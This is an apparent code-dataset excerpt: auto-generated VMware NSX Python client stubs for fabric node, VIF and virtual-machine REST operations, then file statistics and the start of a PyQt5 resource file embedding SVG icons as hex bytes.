type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
get_0_input_value_validator_list = [
]
get_0_output_validator_list = [
]
get_0_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/api/v1/fabric/nodes/{target-node-id}/{target-uri}',
path_variables={
'target_node_id': 'target-node-id',
'target_uri': 'target-uri',
},
query_parameters={
},
content_type='application/json'
)
# properties for list operation
list_input_type = type.StructType('operation-input', {
'cursor': type.OptionalType(type.StringType()),
'discovered_node_id': type.OptionalType(type.StringType()),
'display_name': type.OptionalType(type.StringType()),
'external_id': type.OptionalType(type.StringType()),
'hardware_id': type.OptionalType(type.StringType()),
'hypervisor_os_type': type.OptionalType(type.StringType()),
'included_fields': type.OptionalType(type.StringType()),
'ip_address': type.OptionalType(type.StringType()),
'page_size': type.OptionalType(type.IntegerType()),
'resource_type': type.OptionalType(type.StringType()),
'sort_ascending': type.OptionalType(type.BooleanType()),
'sort_by': type.OptionalType(type.StringType()),
})
list_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
list_input_value_validator_list = [
]
list_output_validator_list = [
HasFieldsOfValidator()
]
list_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/api/v1/fabric/nodes',
path_variables={
},
query_parameters={
'cursor': 'cursor',
'discovered_node_id': 'discovered_node_id',
'display_name': 'display_name',
'external_id': 'external_id',
'hardware_id': 'hardware_id',
'hypervisor_os_type': 'hypervisor_os_type',
'included_fields': 'included_fields',
'ip_address': 'ip_address',
'page_size': 'page_size',
'resource_type': 'resource_type',
'sort_ascending': 'sort_ascending',
'sort_by': 'sort_by',
},
content_type='application/json'
)
# properties for performaction operation
performaction_input_type = type.StructType('operation-input', {
'node_id': type.StringType(),
'action': type.OptionalType(type.StringType()),
'evacuate_powered_off_vms': type.OptionalType(type.BooleanType()),
'vsan_mode': type.OptionalType(type.StringType()),
})
performaction_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
performaction_input_value_validator_list = [
]
performaction_output_validator_list = [
HasFieldsOfValidator()
]
performaction_rest_metadata = OperationRestMetadata(
http_method='POST',
url_template='/api/v1/fabric/nodes/{node-id}',
path_variables={
'node_id': 'node-id',
},
query_parameters={
'action': 'action',
'evacuate_powered_off_vms': 'evacuate_powered_off_vms',
'vsan_mode': 'vsan_mode',
},
content_type='application/json'
)
# properties for restartinventorysync operation
restartinventorysync_input_type = type.StructType('operation-input', {
'node_id': type.StringType(),
})
restartinventorysync_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
restartinventorysync_input_value_validator_list = [
]
restartinventorysync_output_validator_list = [
]
restartinventorysync_rest_metadata = OperationRestMetadata(
http_method='POST',
url_template='/api/v1/fabric/nodes/{node-id}?action=restart_inventory_sync',
path_variables={
'node_id': 'node-id',
},
query_parameters={
},
content_type='application/json'
)
# properties for update operation
update_input_type = type.StructType('operation-input', {
'node_id': type.StringType(),
'node': type.DynamicStructType('vmware.vapi.dynamic_struct', {}, VapiStruct, [type.ReferenceType('com.vmware.nsx.model_client', 'Node')]),
})
update_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
update_input_value_validator_list = [
HasFieldsOfValidator()
]
update_output_validator_list = [
HasFieldsOfValidator()
]
update_rest_metadata = OperationRestMetadata(
http_method='PUT',
url_template='/api/v1/fabric/nodes/{node-id}',
request_body_parameter='node',
path_variables={
'node_id': 'node-id',
},
query_parameters={
},
content_type='application/json'
)
# properties for update_0 operation
update_0_input_type = type.StructType('operation-input', {
'target_node_id': type.StringType(),
'target_uri': type.StringType(),
})
update_0_error_dict = {
'com.vmware.vapi.std.errors.timed_out':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'TimedOut'),
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
update_0_input_value_validator_list = [
]
update_0_output_validator_list = [
]
update_0_rest_metadata = OperationRestMetadata(
http_method='PUT',
url_template='/api/v1/fabric/nodes/{target-node-id}/{target-uri}',
path_variables={
'target_node_id': 'target-node-id',
'target_uri': 'target-uri',
},
query_parameters={
},
content_type='application/json'
)
# properties for upgradeinfra operation
upgradeinfra_input_type = type.StructType('operation-input', {
'node_id': type.StringType(),
'disable_vm_migration': type.OptionalType(type.BooleanType()),
})
upgradeinfra_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
upgradeinfra_input_value_validator_list = [
]
upgradeinfra_output_validator_list = [
HasFieldsOfValidator()
]
upgradeinfra_rest_metadata = OperationRestMetadata(
http_method='POST',
url_template='/api/v1/fabric/nodes/{node-id}?action=upgrade_infra',
path_variables={
'node_id': 'node-id',
},
query_parameters={
'disable_vm_migration': 'disable_vm_migration',
},
content_type='application/json'
)
operations = {
'create': {
'input_type': create_input_type,
'output_type': type.DynamicStructType('vmware.vapi.dynamic_struct', {}, VapiStruct, [type.ReferenceType('com.vmware.nsx.model_client', 'Node')]),
'errors': create_error_dict,
'input_value_validator_list': create_input_value_validator_list,
'output_validator_list': create_output_validator_list,
'task_type': TaskType.NONE,
},
'create_0': {
'input_type': create_0_input_type,
'output_type': type.VoidType(),
'errors': create_0_error_dict,
'input_value_validator_list': create_0_input_value_validator_list,
'output_validator_list': create_0_output_validator_list,
'task_type': TaskType.NONE,
},
'delete': {
'input_type': delete_input_type,
'output_type': type.VoidType(),
'errors': delete_error_dict,
'input_value_validator_list': delete_input_value_validator_list,
'output_validator_list': delete_output_validator_list,
'task_type': TaskType.NONE,
},
'delete_0': {
'input_type': delete_0_input_type,
'output_type': type.VoidType(),
'errors': delete_0_error_dict,
'input_value_validator_list': delete_0_input_value_validator_list,
'output_validator_list': delete_0_output_validator_list,
'task_type': TaskType.NONE,
},
'get': {
'input_type': get_input_type,
'output_type': type.DynamicStructType('vmware.vapi.dynamic_struct', {}, VapiStruct, [type.ReferenceType('com.vmware.nsx.model_client', 'Node')]),
'errors': get_error_dict,
'input_value_validator_list': get_input_value_validator_list,
'output_validator_list': get_output_validator_list,
'task_type': TaskType.NONE,
},
'get_0': {
'input_type': get_0_input_type,
'output_type': type.VoidType(),
'errors': get_0_error_dict,
'input_value_validator_list': get_0_input_value_validator_list,
'output_validator_list': get_0_output_validator_list,
'task_type': TaskType.NONE,
},
'list': {
'input_type': list_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'NodeListResult'),
'errors': list_error_dict,
'input_value_validator_list': list_input_value_validator_list,
'output_validator_list': list_output_validator_list,
'task_type': TaskType.NONE,
},
'performaction': {
'input_type': performaction_input_type,
'output_type': type.DynamicStructType('vmware.vapi.dynamic_struct', {}, VapiStruct, [type.ReferenceType('com.vmware.nsx.model_client', 'Node')]),
'errors': performaction_error_dict,
'input_value_validator_list': performaction_input_value_validator_list,
'output_validator_list': performaction_output_validator_list,
'task_type': TaskType.NONE,
},
'restartinventorysync': {
'input_type': restartinventorysync_input_type,
'output_type': type.VoidType(),
'errors': restartinventorysync_error_dict,
'input_value_validator_list': restartinventorysync_input_value_validator_list,
'output_validator_list': restartinventorysync_output_validator_list,
'task_type': TaskType.NONE,
},
'update': {
'input_type': update_input_type,
'output_type': type.DynamicStructType('vmware.vapi.dynamic_struct', {}, VapiStruct, [type.ReferenceType('com.vmware.nsx.model_client', 'Node')]),
'errors': update_error_dict,
'input_value_validator_list': update_input_value_validator_list,
'output_validator_list': update_output_validator_list,
'task_type': TaskType.NONE,
},
'update_0': {
'input_type': update_0_input_type,
'output_type': type.VoidType(),
'errors': update_0_error_dict,
'input_value_validator_list': update_0_input_value_validator_list,
'output_validator_list': update_0_output_validator_list,
'task_type': TaskType.NONE,
},
'upgradeinfra': {
'input_type': upgradeinfra_input_type,
'output_type': type.DynamicStructType('vmware.vapi.dynamic_struct', {}, VapiStruct, [type.ReferenceType('com.vmware.nsx.model_client', 'Node')]),
'errors': upgradeinfra_error_dict,
'input_value_validator_list': upgradeinfra_input_value_validator_list,
'output_validator_list': upgradeinfra_output_validator_list,
'task_type': TaskType.NONE,
},
}
rest_metadata = {
'create': create_rest_metadata,
'create_0': create_0_rest_metadata,
'delete': delete_rest_metadata,
'delete_0': delete_0_rest_metadata,
'get': get_rest_metadata,
'get_0': get_0_rest_metadata,
'list': list_rest_metadata,
'performaction': performaction_rest_metadata,
'restartinventorysync': restartinventorysync_rest_metadata,
'update': update_rest_metadata,
'update_0': update_0_rest_metadata,
'upgradeinfra': upgradeinfra_rest_metadata,
}
ApiInterfaceStub.__init__(
self, iface_name='com.vmware.nsx.fabric.nodes',
config=config, operations=operations, rest_metadata=rest_metadata,
is_vapi_rest=False)
class _OstypesStub(ApiInterfaceStub):
def __init__(self, config):
# properties for get operation
get_input_type = type.StructType('operation-input', {})
get_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
get_input_value_validator_list = [
]
get_output_validator_list = [
]
get_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/api/v1/fabric/ostypes',
path_variables={
},
query_parameters={
},
content_type='application/json'
)
operations = {
'get': {
'input_type': get_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'SupportedHostOSListResult'),
'errors': get_error_dict,
'input_value_validator_list': get_input_value_validator_list,
'output_validator_list': get_output_validator_list,
'task_type': TaskType.NONE,
},
}
rest_metadata = {
'get': get_rest_metadata,
}
ApiInterfaceStub.__init__(
self, iface_name='com.vmware.nsx.fabric.ostypes',
config=config, operations=operations, rest_metadata=rest_metadata,
is_vapi_rest=False)
class _VifsStub(ApiInterfaceStub):
def __init__(self, config):
# properties for list operation
list_input_type = type.StructType('operation-input', {
'cursor': type.OptionalType(type.StringType()),
'host_id': type.OptionalType(type.StringType()),
'included_fields': type.OptionalType(type.StringType()),
'lport_attachment_id': type.OptionalType(type.StringType()),
'owner_vm_id': type.OptionalType(type.StringType()),
'page_size': type.OptionalType(type.IntegerType()),
'sort_ascending': type.OptionalType(type.BooleanType()),
'sort_by': type.OptionalType(type.StringType()),
'vm_id': type.OptionalType(type.StringType()),
})
list_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
list_input_value_validator_list = [
]
list_output_validator_list = [
]
list_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/api/v1/fabric/vifs',
path_variables={
},
query_parameters={
'cursor': 'cursor',
'host_id': 'host_id',
'included_fields': 'included_fields',
'lport_attachment_id': 'lport_attachment_id',
'owner_vm_id': 'owner_vm_id',
'page_size': 'page_size',
'sort_ascending': 'sort_ascending',
'sort_by': 'sort_by',
'vm_id': 'vm_id',
},
content_type='application/json'
)
operations = {
'list': {
'input_type': list_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'VirtualNetworkInterfaceListResult'),
'errors': list_error_dict,
'input_value_validator_list': list_input_value_validator_list,
'output_validator_list': list_output_validator_list,
'task_type': TaskType.NONE,
},
}
rest_metadata = {
'list': list_rest_metadata,
}
ApiInterfaceStub.__init__(
self, iface_name='com.vmware.nsx.fabric.vifs',
config=config, operations=operations, rest_metadata=rest_metadata,
is_vapi_rest=False)
class _VirtualMachinesStub(ApiInterfaceStub):
def __init__(self, config):
# properties for list operation
list_input_type = type.StructType('operation-input', {
'cursor': type.OptionalType(type.StringType()),
'display_name': type.OptionalType(type.StringType()),
'external_id': type.OptionalType(type.StringType()),
'host_id': type.OptionalType(type.StringType()),
'included_fields': type.OptionalType(type.StringType()),
'page_size': type.OptionalType(type.IntegerType()),
'sort_ascending': type.OptionalType(type.BooleanType()),
'sort_by': type.OptionalType(type.StringType()),
})
list_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
list_input_value_validator_list = [
]
list_output_validator_list = [
]
list_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/api/v1/fabric/virtual-machines',
path_variables={
},
query_parameters={
'cursor': 'cursor',
'display_name': 'display_name',
'external_id': 'external_id',
'host_id': 'host_id',
'included_fields': 'included_fields',
'page_size': 'page_size',
'sort_ascending': 'sort_ascending',
'sort_by': 'sort_by',
},
content_type='application/json'
)
# properties for updatetags operation
updatetags_input_type = type.StructType('operation-input', {
'virtual_machine_tag_update': type.ReferenceType('com.vmware.nsx.model_client', 'VirtualMachineTagUpdate'),
})
updatetags_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
updatetags_input_value_validator_list = [
]
updatetags_output_validator_list = [
]
updatetags_rest_metadata = OperationRestMetadata(
http_method='POST',
url_template='/api/v1/fabric/virtual-machines?action=update_tags',
request_body_parameter='virtual_machine_tag_update',
path_variables={
},
query_parameters={
},
content_type='application/json'
)
operations = {
'list': {
'input_type': list_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'VirtualMachineListResult'),
'errors': list_error_dict,
'input_value_validator_list': list_input_value_validator_list,
'output_validator_list': list_output_validator_list,
'task_type': TaskType.NONE,
},
'updatetags': {
'input_type': updatetags_input_type,
'output_type': type.VoidType(),
'errors': updatetags_error_dict,
'input_value_validator_list': updatetags_input_value_validator_list,
'output_validator_list': updatetags_output_validator_list,
'task_type': TaskType.NONE,
},
}
rest_metadata = {
'list': list_rest_metadata,
'updatetags': updatetags_rest_metadata,
}
ApiInterfaceStub.__init__(
self, iface_name='com.vmware.nsx.fabric.virtual_machines',
config=config, operations=operations, rest_metadata=rest_metadata,
is_vapi_rest=False)
class StubFactory(StubFactoryBase):
_attrs = {
'ComputeCollectionFabricTemplates': ComputeCollectionFabricTemplates,
'ComputeCollections': ComputeCollections,
'ComputeManagers': ComputeManagers,
'ContainerApplicationInstances': ContainerApplicationInstances,
'ContainerApplications': ContainerApplications,
'ContainerClusterNodes': ContainerClusterNodes,
'ContainerClusters': ContainerClusters,
'ContainerIngressPolicies': ContainerIngressPolicies,
'ContainerNetworkPolicies': ContainerNetworkPolicies,
'ContainerProjects': ContainerProjects,
'DiscoveredNodes': DiscoveredNodes,
'Nodes': Nodes,
'Ostypes': Ostypes,
'Vifs': Vifs,
'VirtualMachines': VirtualMachines,
'compute_collections': 'com.vmware.nsx.fabric.compute_collections_client.StubFactory',
'compute_managers': 'com.vmware.nsx.fabric.compute_managers_client.StubFactory',
'nodes': 'com.vmware.nsx.fabric.nodes_client.StubFactory',
'virtual_machines': 'com.vmware.nsx.fabric.virtual_machines_client.StubFactory',
}
| 44.747112
| 161
| 0.597553
| 20,714
| 209,148
| 5.792604
| 0.027083
| 0.067282
| 0.079308
| 0.09761
| 0.907141
| 0.891689
| 0.858786
| 0.842051
| 0.826199
| 0.81334
| 0
| 0.001276
| 0.295652
| 209,148
| 4,673
| 162
| 44.756687
| 0.813234
| 0.269058
| 0
| 0.704172
| 1
| 0.00171
| 0.308574
| 0.198605
| 0
| 0
| 0
| 0
| 0
| 1
| 0.026676
| false
| 0
| 0.004104
| 0
| 0.075581
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
4a621edb562c9655024f3170e500a63fcfdad5dc
| 534,717
|
py
|
Python
|
UI_Compiled/icons_qrc_rc.py
|
Tuhin-thinks/Github-Single-FileDownloader
|
f1473a0ea6b4b68c327d4d4d5eb3f13721cfa2f0
|
[
"MIT"
] | null | null | null |
UI_Compiled/icons_qrc_rc.py
|
Tuhin-thinks/Github-Single-FileDownloader
|
f1473a0ea6b4b68c327d4d4d5eb3f13721cfa2f0
|
[
"MIT"
] | null | null | null |
UI_Compiled/icons_qrc_rc.py
|
Tuhin-thinks/Github-Single-FileDownloader
|
f1473a0ea6b4b68c327d4d4d5eb3f13721cfa2f0
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# Resource object code
#
# Created by: The Resource Compiler for PyQt5 (Qt v5.15.2)
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore
qt_resource_data = b"\
\x00\x00\x01\x17\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x6e\x61\x76\x69\x67\
\x61\x74\x69\x6f\x6e\x2d\x32\x22\x3e\x3c\x70\x6f\x6c\x79\x67\x6f\
\x6e\x20\x70\x6f\x69\x6e\x74\x73\x3d\x22\x31\x32\x20\x32\x20\x31\
\x39\x20\x32\x31\x20\x31\x32\x20\x31\x37\x20\x35\x20\x32\x31\x20\
\x31\x32\x20\x32\x22\x3e\x3c\x2f\x70\x6f\x6c\x79\x67\x6f\x6e\x3e\
\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\xe4\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x68\x61\x72\x64\x2d\
\x64\x72\x69\x76\x65\x22\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\
\x22\x32\x32\x22\x20\x79\x31\x3d\x22\x31\x32\x22\x20\x78\x32\x3d\
\x22\x32\x22\x20\x79\x32\x3d\x22\x31\x32\x22\x3e\x3c\x2f\x6c\x69\
\x6e\x65\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x35\x2e\x34\
\x35\x20\x35\x2e\x31\x31\x4c\x32\x20\x31\x32\x76\x36\x61\x32\x20\
\x32\x20\x30\x20\x30\x20\x30\x20\x32\x20\x32\x68\x31\x36\x61\x32\
\x20\x32\x20\x30\x20\x30\x20\x30\x20\x32\x2d\x32\x76\x2d\x36\x6c\
\x2d\x33\x2e\x34\x35\x2d\x36\x2e\x38\x39\x41\x32\x20\x32\x20\x30\
\x20\x30\x20\x30\x20\x31\x36\x2e\x37\x36\x20\x34\x48\x37\x2e\x32\
\x34\x61\x32\x20\x32\x20\x30\x20\x30\x20\x30\x2d\x31\x2e\x37\x39\
\x20\x31\x2e\x31\x31\x7a\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\
\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x36\x22\x20\x79\x31\x3d\x22\
\x31\x36\x22\x20\x78\x32\x3d\x22\x36\x2e\x30\x31\x22\x20\x79\x32\
\x3d\x22\x31\x36\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\
\x6e\x65\x20\x78\x31\x3d\x22\x31\x30\x22\x20\x79\x31\x3d\x22\x31\
\x36\x22\x20\x78\x32\x3d\x22\x31\x30\x2e\x30\x31\x22\x20\x79\x32\
\x3d\x22\x31\x36\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\
\x76\x67\x3e\
\x00\x00\x01\xd9\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x66\x69\x6c\x65\x2d\
\x74\x65\x78\x74\x22\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\
\x31\x34\x20\x32\x48\x36\x61\x32\x20\x32\x20\x30\x20\x30\x20\x30\
\x2d\x32\x20\x32\x76\x31\x36\x61\x32\x20\x32\x20\x30\x20\x30\x20\
\x30\x20\x32\x20\x32\x68\x31\x32\x61\x32\x20\x32\x20\x30\x20\x30\
\x20\x30\x20\x32\x2d\x32\x56\x38\x7a\x22\x3e\x3c\x2f\x70\x61\x74\
\x68\x3e\x3c\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x20\x70\x6f\x69\x6e\
\x74\x73\x3d\x22\x31\x34\x20\x32\x20\x31\x34\x20\x38\x20\x32\x30\
\x20\x38\x22\x3e\x3c\x2f\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x3e\x3c\
\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\x36\x22\x20\x79\x31\x3d\
\x22\x31\x33\x22\x20\x78\x32\x3d\x22\x38\x22\x20\x79\x32\x3d\x22\
\x31\x33\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\
\x20\x78\x31\x3d\x22\x31\x36\x22\x20\x79\x31\x3d\x22\x31\x37\x22\
\x20\x78\x32\x3d\x22\x38\x22\x20\x79\x32\x3d\x22\x31\x37\x22\x3e\
\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x70\x6f\x6c\x79\x6c\x69\x6e\x65\
